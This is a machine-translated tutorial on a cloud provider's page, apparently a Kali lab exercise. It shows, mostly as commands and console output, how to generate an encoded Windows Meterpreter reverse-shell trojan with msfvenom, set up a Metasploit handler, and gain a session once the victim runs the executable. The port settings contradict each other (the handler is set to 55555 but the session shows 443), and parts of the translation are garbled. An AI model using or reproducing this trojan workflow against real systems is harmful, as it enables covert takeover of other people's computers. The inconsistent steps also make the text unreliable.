Kali Defense 9th Chapter Metasploit of my remote control software

Last Update:2018-07-17 Source: Internet

Author: User

Tags thread

Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more ＞

Preparation Tools

1. Kali System IP 10.10.10.131

2, victim system IP 10.10.10.133

Steps:

1. Trojan Control Program

root@kali:~# msfvenom-p windows/meterpreter/reverse_tcp-e x86/shikata_ga_nai-i 5-b ' \x00 ' LHOST=10.10.10.131 LPORT=44 3-f exe > Abc.exe

No platform was selected, choosing Msf::module::P latform::windows from the payload

No Arch selected, selecting Arch:x86 from the payload

Found 1 Compatible encoders

Attempting to encode payload with 5 iterations of X86/shikata_ga_nai

X86/shikata_ga_nai succeeded with size (iteration=0)

X86/shikata_ga_nai succeeded with size 387 (iteration=1)

X86/shikata_ga_nai succeeded with size 414 (iteration=2)

X86/shikata_ga_nai succeeded with size 441 (iteration=3)

X86/shikata_ga_nai succeeded with size 468 (iteration=4)

X86/shikata_ga_nai chosen with final size 468

Payload size:468 bytes

Note: Lhost and Lport are local to their IP, not the victim's IP

2. Start Metasploit by command

root@kali:~# Msfconsole

+-------------------------------------------------------+

| METASPLOIT by Rapid7 |

+---------------------------+---------------------------+

| __________________ | |

| ==c (___ (_ () | | | "" "" "" "" "" "| ======[*** |

| )=\ | | EXPLOIT \ |

| // \\ | |_____________\_______ |

| \ \ | |==[msf >]============\ |

| // \\ | |______________________\ |

| RECON \ | \(@)(@)(@)(@)(@)(@)(@)/ |

| // \\ | ********************* |

+---------------------------+---------------------------+

| o o O | \'\/\/\/'/ |

| o O | )======( |

| o | .' LOOT '. |

| | | ^^ ^^ ^^ ^^ ^^ ^^ ^^ |l___ | / _|| __ \ |

| | PAYLOAD | "" \___, | / (_|| _ \ |

| |________________|__|) __| | | __|| _) | |

| | (@) (@)"""**| (@) (@)**| (@) | " || " |

| = = = = = = = = = = = = | '--------------' |

+---------------------------+---------------------------+

Save 45% of your time on large engagements with Metasploit Pro

Learn More on Http://rapid7.com/metasploit

=[Metasploit v4.11.5-2015103001]

+----=[exploits-864 auxiliary-251 post]

+----=[432 payloads-37 encoders-8 Nops]

+----=[free Metasploit Pro Trial:http://r-7.co/trymsp]

3. Using handler module

MSF > Use Exploit/multi/handler

4. View handler Parameters

MSF exploit (handler) > Show options

Module Options (Exploit/multi/handler):

Name Current Setting Required Description

---- --------------- -------- -----------

Exploit Target:

Id Name

-- ----

0 Wildcard Target

5. Shellcode setting

MSF exploit (handler) > Set Payload windows/meterpreter/reverse_tcp

Payload = Windows/meterpreter/reverse_tcp

MSF exploit (handler) > SHOW

[-] Unknown Command:show.

MSF exploit (handler) > Show options

Module Options (Exploit/multi/handler):

Name Current Setting Required Description

---- --------------- -------- -----------

Payload Options (WINDOWS/METERPRETER/REVERSE_TCP):

Name Current Setting Required Description

---- --------------- -------- -----------

Exitfunc process Yes Exit technique (Accepted: ", SEH, Thread, process, none)

Lhost 10.10.10.131 Yes the listen address

Lport 4444 Yes the listen port

Exploit Target:

Id Name

-- ----

0 Wildcard Target

6. Modify the Lhost and Lport ports

MSF exploit (handler) > Set Lhost 10.10.10.131

Lhost = 10.10.10.131

MSF exploit (handler) > Set Lport 55555

Lport = 55555

MSF exploit (handler) > Show options

Module Options (Exploit/multi/handler):

Name Current Setting Required Description

---- --------------- -------- -----------

Payload Options (WINDOWS/METERPRETER/REVERSE_TCP):

Name Current Setting Required Description

---- --------------- -------- -----------

Exitfunc process Yes Exit technique (Accepted: ", SEH, Thread, process, none)

Lhost 10.10.10.131 Yes the listen address

Lport 55555 Yes the listen port

7. Execute exploit command

MSF exploit (handler) > Exploit

8. The victim executes the Abc.exe file

9. Verification

[*] Started Reverse Handler on 10.10.10.131:443

[*] Starting the payload handler ...

[*] Sending stage (885806 bytes) to 10.10.10.133

[*] meterpreter session 1 opened (10.10.10.131:443 -> 10.10.10.133:1049) at 2015-12-07 23:41:20 +0800

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More